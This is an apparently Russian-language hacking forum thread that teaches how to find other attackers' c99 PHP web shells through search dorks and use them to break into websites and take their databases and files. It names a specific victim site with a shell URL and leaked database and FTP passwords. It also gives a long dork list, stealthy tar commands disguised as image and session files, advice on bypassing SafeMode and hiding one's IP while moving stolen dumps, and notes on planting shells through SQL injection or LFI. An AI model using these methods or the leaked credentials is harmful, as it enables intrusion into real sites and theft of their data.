Очень часто все более-менее толковые компьютерщики задаются навязчивой идеей что нибудь поломать или кому нибудь бяку сделать. Ну и возникают вопросы: Как ? Где почитать? Что такое MySQL и PHP ? Ну и остальное, что на взлом может повлиять. Поэтому сделаем маленький экскурс в хакинг сайтов, и их копирование на свой компьютер для последующего ознакомления. Сегодня желания особого растекаться мыслью по древу нет, по этому расскажу пару самых примитивных примеров. С чего так сказать начинал я Пример №1 Исходный материал: Человек любознательный, без особых извилин в PHP, MySQL и XSS. Правильные и прямые руки Поисковые системы Google.com, Yandex.ru Цель: Получить доступ к сайту Скопировать базу данных исодержимое сайта на свой ПК ************************************** Выполнение практического занятия: 1) Качаем shell (Google в помощь их масса) 2) Распаковываем архив и заливаем первый попавшийся шелл на свой хост. 3) Заходим на свой шелл изнакомимся с его внешним видом. В первую очередь нам нужны "особенные" фразы, которые помогут отделить данные шеллы в инете от других скриптов и страниц. 4) Мне почему то нравится shellC2007Shell, это из разряда С99Shell.Поэтому заходим в Google и пишем фразу "c2007shell v. 1.0 pre-release build", либо другую которая связанна с шеллом. 5) Видим много (или мало) результатов поиска. Это зависит от особенной фразы. 6) Идем перебором по каждой найденной ссылке. И смотрим на работоспособность шеллов, который кто то для "нас" любезно залил. 7) Если с Google хороших ссылок не нашли. Не вешаем нос, Гардемарины. Идем в гости к Yandex, Yahoo, MSN и др. поисковым системам, которые сможем вспомнить. Даже при самых плохих раскладах Вы можете найти не менее 1-5 хороших шеллов для тренировки. Для практического занятия я уже залил один шелл. Будем считать, что мы его нашли поиском: http://www.saleua.com/images/2007x.php 8) Заглядываем внутрь сайта и понимаем, что это какой то магазин. Побегав по всяким папкам и файлам находим следующие данные: configure.php Код: // define our database connection define('DB_SERVER', 'billing.mycard.net.ua'); // eg, localhost - should not be empty for productive servers define('DB_SERVER_USERNAME', 'saleua'); define('DB_SERVER_PASSWORD', 'skirda'); define('DB_DATABASE', 'saleua'); define('USE_PCONNECT', 'false'); // use persistent connections? define('STORE_SESSIONS', 'mysql'); // leave empty '' for default handler or set to 'mysql' 9) Опачки Мы нашли данные к базе MySQL. Делаем её BackUp с помощью скрипта Sypex Dumper Lite. Находим скрипт в аттаче. 10) Теперь нужно подумать надкопированием файлов на свой ПК. Начинаем искать решение от простого к сложному. Самый простой способ - слить файлы по FTP Возможно он не самый простой для продвинутых, но для новичков - проще пареной репы. 11) Как же добыть пароль на FTP ??? Пробуем подставлять пользователей и пароли, которые нам уже известны. Около 70% веб-мастеров делают одинаковые пароли на все что можно. Начиная от базы данных, заканчивая админкой и доступом FTP. 12) Блин, вот какая шара то.... Опять повезло. ftp://www.saleua.com user: saleu password: skirda Прямо как пользователь и пароль кMySQL 13) Льем базу "дампером", а файлы по FTP. 14) Рип у нас готов... Пример №2 Исходный материал: Человек любознательный, ссредними или хорошими извилинами в PHP, MySQL и XSS. Правильные и качественно прямые руки Поисковые системы Google.com, Yandex.ru Цель: Получить доступ к сайту Скопировать базу данных и содержимое сайта на свой ПК Краткая инструкция по эксплуатации: 1) Заходим на antichat.ru 2) Качаем видео и внимательно его смотрим. 3) Разыскиваем объект (уязвимый движок или скрипт) для изучения. 4) Внимательно его рассматриваем и запоминаем "особенные" фразы. 5) Пользуясь услугами поисковых систем находим уязвимые скрипты. 6) Еще раз смотрим видео и пытаемся повторить аналогичное. 7) Если получилось - заливаем шелл. 8) Дальше Вы все знаете.. P.S. Данная инструкция носит чисто информативных характер и ни в коем случае не может применяться для взлома В противном случае Вы можете получить по шапке. P.S.S. Не проводите деструктивных действий с www.saleua.com. Хоть сайт и не мой (мне его не жалко), но других примеров делать не буду. Если кто то изменит - другие будут только текстами довольствоваться, без практики... P.S.S.S. Если вдруг заглянут в этот топик хорошие рипперы, то они могут побегать по хосту и найти еще парочку объектов для рипования по адресу/usr/home/
в первом сообщении как пример взят c99, то вот вам поисковые фразы для поисковиков: раз в первом сообщении как пример взят c99, то вот вам поисковые фразы для поисковиков: Код: inurl:"c99.php" inurl:c99.php uid=0(root) allinurl:c99.php inurl:"c99.php" inurl:"c99.php" inurl:"/c99.php" intitle:"C99shell" inurl:"/c99.php" intitle:"C99shell" inurl:"/c99.php" intitle:"C99shell" C99Shell v. 1.0 pre-release build #5 inurl:c99.php inurl:c99.php --[ c99shell v. 1.0 pre-release build #16 c99shell linux infong c99shell linux infong C99Shell v. 1.0 pre-release build !C99Shell v. 1.0 beta! Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout !c99shell v. 1+Safe-mode: OFF (not secure) "C99Shell v. 1.0 pre-release build " inurl:c99.php intitle:C99Shell v. 1.0 pre-release +uname "Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout intitle:!C99Shell v. 1.0 pre-release build #16! root !C99Shell v. 1.0 pre-release build #5! inurl:"c99.php" C99Shell v. 1.0 pre-release build #16! c99shell v. 1.0 pre-release build #16 intitle:c99shell intext:uname allintext:C99Shell v. 1.0 pre-release build #12 c99shell v. 1.0 pre-release build #16 --[ c99shell v. 1.0 pre-release build #15 | Powered by ]-- allinurl: "c99.php" allinurl: "c99.php" Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout "c99shell v 1.0" ftp apache inurl:c99.php c99shell+v.+1.0 16 C99Shell v. 1.0 pre-release build #16 download intitle:c99shell "Software: Apache" allinurl: c99.php allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout powered by Captain Crunch Security Team powered by Captain Crunch Security Team !C99Shell v. 1.0 pre-release build #5! c99shell v. 1.0 release security c99shell v. 1.0 pre-release build inurl:c99.php c99shell [file on secure ok ]? C99Shell v. 1.3 Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:c99.php uid=0(root) powered by Captain Crunch Security Team C99Shell v. 1.0 pre-release build #16 c99shell[on file]ok c99shell[file on ]ok Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:c99.php "C99Shell v. 1.0 pre" =C99Shell v. 1.0 pre-release Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout c99shell v. pre-release build inurl:c99.php c99 shell inurl:c99.php c99 shell powered by Captain Crunch Security Team inurl:c99.php inurl:c99.php !C99Shell v. 1.0 pre-release build #5! intitle:"c99shell" Linux infong 2.4 C99Shell v. 1.0 beta ! C99Shell v. 1.0 pre-release build # inurl:"c99.php" allintext:C99Shell v. 1.0 pre-release build #12 "C99Shell v. 1.0 pre" powered by Captain Crunch Security Team Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:/c99.php? allinurl:c99.php intitle:C99Shell pre-release inurl:"c99.php" powered by Captain Crunch Security Team inurl:c99.php C99Shell v. 1.0 pre-release build #16! allinurl:c99.php C99Shell v. 1.0 pre-release build #16 administrator powered by Captain Crunch Security Team powered by Captain Crunch Security Team C99Shell v. 1.0 pre-release build #12 c99shell v.1.0 allinurl:c99.php "c99shell v. 1.0 pre-release build" "c99shell v. 1.0 " ok c99.php Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout c99shell v. 1.0 pre-release build #16 | !C99Shell v. 1.0 pre-release build #5! !C99Shell v. 1.0 pre-release build #5! allinurl:/c99.php powered by Captain Crunch Security Team inurl:c99.php Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:c99.php powered by Captain Crunch Security Team inurl:c99.php C99Shell v. 1.0 pre-release inurl:c99.php inurl:"c99.php" allinurl:"c99.php" Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout powered by Captain Crunch Security Team Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout" C99Shell v. 1.0 pre-release build #16 software apache Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout "c99shell v 1.0" inurl:"c99.php" C99Shell v. 1.0 pre-release build #16! "c99shell v. 1.0 pre-release" c99shell v. 1.0 pre-release build #5 Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout !C99Shell v. 1.0 pre-release build #16! inurl:c99.php intitle:C99Shell v. 1.0 pre-release +uname inurl:c99.php c99shell v. 1.0 allinurl: c99.php --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]-- inurl:"/c99.php" c99shell +uname c99shell php + uname c99shell php + uname --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]-- allinurl:c99.php !C99Shell v. 1.0 pre-release build #5! C99Shell v.1.0 pre-release Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:c99.php "Encoder Tools Proc. FTP brute" c99shell v. 1.0 pre inurl:c99.php
команды используемые на шелле at - указание времени когда выполняется команда chown - смена хозяина файла batch - выполнить команду во время загрузки telnet - клиент телнет ftp - клиент фтп rmdir - удалить каталог finger/who/users - вывести список работающих в системе. gcc - компилятор C ftpwho - фингер для фтп mv - переместить файл kill - прекратить процесс cat - текстовой редактор ls - просмотр каталога chmod - смена привилегий файлового доступа rm - удалить файл id - просмотр прав, т.е.uid и gid mail - работа с мылом cd - сменить каталог cron - демон команд at и batch logname - получение имени регистрации cp - копирование чего либо. uname -a - всё о версии системы. crontab - задать резервы времени между запусками прог. ps - ознакомление со списком процессов. pwcheck - просмотр дефолтового файла пароля. umask - маска для определённого файла. su - программа su sleep - преостановить процесс. passwd - работа с паролем. news - отображение usenet write - мессага текущему юзеру. uux - выполнить комманды на remote компе nslookup - сводки гидромедцентра о IP uucp - копирование файл с/на remote комп uuname - список хостов UUCP more - вывод текстовика в постраничном режиме greg - поиск строки в фйле по заданному ключу greg -i - то же,без учёта регистра. uuencode - содание текстовой версии двоичного файла( для мыла) uudecode – создание двоичной версии текстового файла tar - создание архивов файлов. uncompress - получение исходного из сжатого файла. uptime – время запуска машины. ping - %) читай man.
Упаковка файлов: размер папки сайта: du -hsx/home/user_name/www/ упаковка указаной папки: к примеру в дире с картинками упаковываем файл под названия картинок: tar cjf avatar_1744.jpg/home/user_name/www/ в /tmp для безпаливности: tar cjfsess_f954433701e7a425477209c1e25bd86d /home/user_name/www/ в данных случаях при скачивании переименовываем в *.tar.bz2 в винде: к примеру хостинг 1gb: т.к. у них на сервантах стоит чтото типа cygwin - можно выполнять никсовые команды, типа du, cat, ls, uname и т.д., но имеется Rar архиватор, так что выполняем команду: Rar.exe a -r имя_архива.разрешениеd:\hst\путь\http\ либо закачиваем к примеру архиватор 7-zip в папку temp (прав вполне хватит, и даже на запуск софта) и выполняем: 7z a -tzip имя_архива.разрешениеd:\www\http\ SafeMode: В никсе и винде обычно легко обойти при помощи cgi скриптов, главное чтоб хватило прав на запись в папку/cgi-bin/ и т.д., но если нет возможности на запись, то бывают такие случаи, что cgi скрипт можно выполнить в любой дире - inurl:index.plк приеру (знаю несколько хостингов, которые этим страдают и после обхода SafeMode с правами nobody - есть возможность читать диры других юзеров: 38628566 drwxr-x--- 18 user nobody 4096 Mar 8 16:52 . ). Если не получается обойти (чтоб упаковать командами), то юзаемalfaungzipper.com который позволит упаковывать сайт, несмотря наSafeMode :ay: Загрузка рипа/дампа: да бы не палить свой IP или не выкачивать большой объём через носок или скорость с носка малая, то я предпочитаю юзать Rapidshare Remote-Upload + скрипты, установленые на абузоустойчивом хостинге, либо накрайняк с рапиды сливаю через servage.net (к примеру т.к. у них канал хороший), а затем прогоняю через другие хостинги и/или снова на Rapidshare.
Не понял ничего абсолютно, какой-то набор слов написан в теме, без обид. Что за shell? Откуда его скачать? Если скачал то что с ним делать? Куда загрузить, что вписать что вообще с ним делать!?
Shell- php-вирус\троян\бэкдор. Его можно залить через SQL-инекцию, или вставить php-код в картинку и проинклюдить её при помощи LFI. Гугли вообщем